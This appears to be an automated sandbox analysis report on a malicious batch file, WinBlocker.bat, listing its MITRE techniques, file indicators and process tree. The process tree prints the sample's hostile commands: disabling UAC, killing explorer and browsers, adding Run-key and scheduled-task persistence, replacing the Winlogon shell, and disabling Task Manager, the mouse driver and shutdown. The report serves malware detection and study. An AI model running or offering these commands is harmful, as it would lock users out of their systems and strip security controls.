16a9fd99658aec5a790b84002e2bd1388d82f0b0ac8d951fc65195ca4f3305af

Analysis

max time kernel
150s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06/08/2024, 02:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinBlocker.bat
Size

2KB
MD5

1b5a43b427cbec4b2d98381bd745f252
SHA1

e35fa4eb5b4d03de11e34b648ccd0eb3bf64aca9
SHA256

16a9fd99658aec5a790b84002e2bd1388d82f0b0ac8d951fc65195ca4f3305af
SHA512

3689f9000a0ce44ba4a1503f59e3b94706ff9f73cc6baeb0f1105971c1c3fdc39373d091c8187ad681af8e4954bd0bca602ced76f080faa1c2f4082219c085a5

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\en-US\rdpdr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\wacompen.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\msgpiowin32.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\WdiWiFi.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\AppVStrm.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\intelppm.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\urscx01000.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\winhvr.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pmem.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\vdrvroot.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\msisadrv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbprint.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\Dmpusbstor.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\buttonconverter.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\usbhub.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\wimmount.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\SpatialGraphFilter.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vmbkmcl.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\watchdog.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\disk.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\nvdimm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mspqm.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\sdstor.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\VerifierExt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\kbdhid.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\umpass.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\wmiacpi.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pcmcia.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\processr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\exfat.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ksecdd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\pci.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pdc.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\qwavedrv.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\nsiproxy.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\rdbss.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\en-US\Microsoft.Bluetooth.Profiles.HidOverGatt.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\scfilter.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\spaceport.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\afunix.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\BtaMPM.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\cnghwassist.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\hidclass.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\i8042prt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UcmCx.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vwifibus.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\acpipmi.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\ataport.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\mslldp.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\wudfpf.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ndiswan.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\acpitime.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\nwifi.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\tcpipreg.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\wfplwfs.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\disk.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ipt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\raspptp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UevAgentDriver.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\vhdmp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\beep.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dumpsdport.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\IndirectKmd.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\netvsc.sys.mui	cmd.exe

Manipulates Digital Signatures 4 IoCs

Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll	cmd.exe
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wintrust.dll	cmd.exe

Boot or Logon Autostart Execution: Print Processors 1 TTPs 1 IoCs

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

persistence

Print Processors

T1547.012

description	ioc	Process
File opened for modification	C:\Windows\System32\spool\prtprocs\x64\winprint.dll	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBlocker.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBlocker.bat	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinBlocker.bat = "WinBlocker.bat"	reg.exe

Drops desktop.ini file(s) 31 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WinSxS\AM73FD~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM52EB~2.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AME369~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA114~1.423\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5D45~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM60C1~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM7F8B~2.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD8BC~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM1A03~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM031C~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM82AF~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD8B8~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM10F5~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM6E1C~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM3CA2~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM26C1~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM7F64~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM3600~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMC81E~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMF414~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA417~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMB161~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AME3F0~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMBE63~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMB420~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM066F~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM2651~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM91A0~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMBA5B~1.1_N\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM33F5~1.1_N\desktop.ini	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM0A9A~1.1_N\Desktop.ini	cmd.exe

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Windows\BITLOC~1\autorun.inf	cmd.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\en-US\scrrun.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\netman.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\mrt_map.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\InstallShield\setup.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\uk-UA\gpsvc.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\shdocvw.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\useractivitybroker.dll	cmd.exe
File opened for modification	C:\Windows\System32\en-US\cmd.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\en-US\dsquery.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\ir32_32original.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\sstpsvc.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\ddraw.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\mprddm.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\NetworkIcon.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\MtfDecoder.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\KBDINORI.DLL	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wlanutil.dll	cmd.exe
File opened for modification	C:\Windows\System32\oobe\en-US\pnpibs.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BRANCH~1\BranchCacheClientSettingData.cdxml	cmd.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\wcncsvc.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\PSHED.DLL	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\VpnClient\PS_VpnConnectionTriggerTrustedNetwork_v1.0.cdxml	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\sethc.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\dosettings.dll	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\netvchannel.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\en-US\MSchedExe.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\SyncProxy.dll	cmd.exe
File opened for modification	C:\Windows\System32\uk-UA\wlanapi.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\propsys.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\LaunchTM.exe	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDscXMachine.psm1	cmd.exe
File opened for modification	C:\Windows\SysWOW64\uk-UA\WWAHost.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\C_20833.NLS	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\sppnp.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\c_fsinfrastructure.inf_amd64_1ef682cfd6fc7d1c\c_fsinfrastructure.inf	cmd.exe
File opened for modification	C:\Windows\System32\he-IL\WWAHost.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\spp\tokens\skus\PR3CDC~1\ProfessionalWorkstation-Volume-CSVLK-4-ul-phn-rtm.xrm-ms	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Dism\ja-JP\VhdProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\dps.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ro-RO\msimsg.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-jp\wininetlui.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\driverquery.exe	cmd.exe
File opened for modification	C:\Windows\System32\eeprov.dll	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\EaseOfAccessDialog.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\xwtpw32.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\BthMtpContextHandler.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\unlodctr.exe	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\TSGENE~1.INF\TsUsbGD.sys	cmd.exe
File opened for modification	C:\Windows\System32\en-US\edputil.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\setupapi.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\uk-UA\windows.ui.xaml.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\eudcedit.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\twinui.appcore.dll	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\WudfSMCClassExt.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\inetcpl.cpl.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\fr-FR\usbprint.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\uk-UA\SetNetworkLocationFlyout.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_PackageResource\en-US\PackageProvider.psd1	cmd.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\WindowsFeatureSet\WindowsFeatureSet.Schema.psm1	cmd.exe
File opened for modification	C:\Windows\System32\aadWamExtension.dll	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\setupcln.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\diagtrack.dll.mui	cmd.exe

Modifies termsrv.dll 1 TTPs 1 IoCs

Commonly used to allow simultaneous RDP sessions.

Remote Desktop Protocol

T1021.001

description	ioc	Process
File opened for modification	C:\Windows\System32\termsrv.dll	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WinSxS\AMC923~1.1_E\CLICON~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMBC93~1.1_N\AP40C7~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM052D~1.789\r\PRINTW~2.DLL	cmd.exe
File opened for modification	C:\Windows\Fonts\smallfe.fon	cmd.exe
File opened for modification	C:\Windows\Installer\$PATCH~1\Managed\1D5E3C~1\100~1.402\F_BA02~1	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5CFE~1.1_F\MSG711~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM2247~1.1_D\LANMAN~1.ADM	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD64_~4.126\r\usbxhci.inf	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5F25~1.1_U\RDPINI~1.MUI	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Diagnostics.FileVersionInfo.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM7BD6~1.746\f\TRANSL~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA903~1.1_N\MS1EB3~1.PS1	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM06B8~1.746\r\WINDOW~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD64_~1.1_U\BOOTMG~2.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM3F75~1.1_E\NTDSMS~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMC551~1.1_I\NETDIA~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMC2A9~1.1_N\shellbrd.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5F90~1.126\CORTAN~1.HTM	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMC372~1.153\WINDOW~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AME2A5~1.1_F\NETDAC~1.MUI	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.InteropServices.dll	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\HY4F58~1.CAT	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM0AEE~1.1_J\CHARGE~1.INF	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM3039~1.1_N\EEFDE7~1.BIN	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD87C~2.1_N\VIDEOH~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM2B4E~1.746\r\tsmf.dll	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-Client-Desktop-Required-Package0417~31bf3856ad364e35~amd64~~10.0.19041.264.cat	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA563~1.117\enterpriseNgcEnrollment.js	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMEE85~1.1_I\DEVICE~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM2B46~1.423\restore.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMD7B0~1.1_F\ARCSAS~1.INF	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMAF66~1.1_I\KEYBOA~2.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM01CC~1.1_N\sxs.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMDF15~1.1_D\HELPEX~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMFD12~1.1_N\NarratorUWPSquare44x44Logo.targetsize-32_altform-unplated_contrast-black.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM4572~1.1_N\OFFICE~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA4CB~1.1_J\RDPEND~1.MUI	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ja\System.Web.Routing.resources.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM550B~1.1_E\ROOTPO~1.MFL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMA50B~1.1_N\AMSIPR~1.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AME221~1.746\f\AppxSip.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMB684~1.789\f\APPREA~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM253D~1.126\f\WINRES~1.EXE	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM2D64~1.102\APPXSI~1.P7X	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM9729~1.153\HeadsetSystemToastIcon.contrast-white.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM6061~1.120\f\WORKFO~2.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM74AB~1.126\f\SEARCH~3.DLL	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMB0D4~1.1_N\EAPGEN~1.XSD	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMFA47~1.1_I\SCARDD~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM1789~1.153\f\REMOVA~1.DLL	cmd.exe
File opened for modification	C:\Windows\rescache\_merged\330034~1\452203~1.PRI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM8F28~1.126\{A5A7C~1.BIN	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM188E~1.1_E\WSLCON~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AMBDB3~1.1_U\PHOTOV~1.MUI	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-PowerShell-V2-Client-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.804.cat	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM5A17~1.1_N\MediumRoom.bin	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM51E2~1.906\ftphost.dll	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM7FFF~1.1_I\mstscax.mfl	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM8EB5~1.264\r\win32u.dll	cmd.exe
File opened for modification	C:\Windows\servicing\INBOXF~1\metadata\LA528A~1.MUM	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM3E64~1.1_N\DDORES~1.MUN	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM8AE7~1.1_U\PNPUID~1.MUI	cmd.exe
File opened for modification	C:\Windows\WinSxS\AM35A0~1.1_N\PHONEP~1.DLL	cmd.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.AccountsControl\Windows.UI.AccountsControl.pri	cmd.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4764	timeout.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
668	taskkill.exe
2936	taskkill.exe
3996	taskkill.exe
1836	taskkill.exe
3292	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2112	schtasks.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	668	taskkill.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	3996	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	3292	taskkill.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 624 wrote to memory of 3740	624	cmd.exe	84
PID 624 wrote to memory of 3740	624	cmd.exe	84
PID 624 wrote to memory of 668	624	cmd.exe	85
PID 624 wrote to memory of 668	624	cmd.exe	85
PID 624 wrote to memory of 1168	624	cmd.exe	88
PID 624 wrote to memory of 1168	624	cmd.exe	88
PID 624 wrote to memory of 4176	624	cmd.exe	89
PID 624 wrote to memory of 4176	624	cmd.exe	89
PID 624 wrote to memory of 2272	624	cmd.exe	92
PID 624 wrote to memory of 2272	624	cmd.exe	92
PID 624 wrote to memory of 2112	624	cmd.exe	93
PID 624 wrote to memory of 2112	624	cmd.exe	93
PID 624 wrote to memory of 2936	624	cmd.exe	94
PID 624 wrote to memory of 2936	624	cmd.exe	94
PID 624 wrote to memory of 3996	624	cmd.exe	95
PID 624 wrote to memory of 3996	624	cmd.exe	95
PID 624 wrote to memory of 1836	624	cmd.exe	97
PID 624 wrote to memory of 1836	624	cmd.exe	97
PID 624 wrote to memory of 3292	624	cmd.exe	98
PID 624 wrote to memory of 3292	624	cmd.exe	98
PID 624 wrote to memory of 4848	624	cmd.exe	99
PID 624 wrote to memory of 4848	624	cmd.exe	99
PID 624 wrote to memory of 2736	624	cmd.exe	100
PID 624 wrote to memory of 2736	624	cmd.exe	100
PID 624 wrote to memory of 4600	624	cmd.exe	101
PID 624 wrote to memory of 4600	624	cmd.exe	101
PID 624 wrote to memory of 2764	624	cmd.exe	102
PID 624 wrote to memory of 2764	624	cmd.exe	102
PID 624 wrote to memory of 4764	624	cmd.exe	103
PID 624 wrote to memory of 4764	624	cmd.exe	103

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WinBlocker.bat"
1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Boot or Logon Autostart Execution: Print Processors
- Drops startup file
- Drops desktop.ini file(s)
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies termsrv.dll
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:624
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:3740
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM explorer.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:668
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - UAC bypass
  PID:1168
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\admin.vbs
  2⤵
  PID:4176
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinBlocker.bat" /t REG_SZ /d "WinBlocker.bat" /f
  2⤵
  - Adds Run key to start application
  PID:2272
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "WinBlocker.bat" /tr "WinBlocker.bat" /sc ONLOGON /rl HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2112
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM explorer.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM msedge.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3996
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM chrome.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1836
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM browser.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3292
- C:\Windows\system32\reg.exe
  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WinBlocker.bat" /f
  2⤵
  PID:4848
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:2736
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouclass" /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4600
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableShutdownButton /t REG_DWORD /d 1 /f
  2⤵
  PID:2764
- C:\Windows\system32\timeout.exe
  TIMEOUT /T 900 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:4764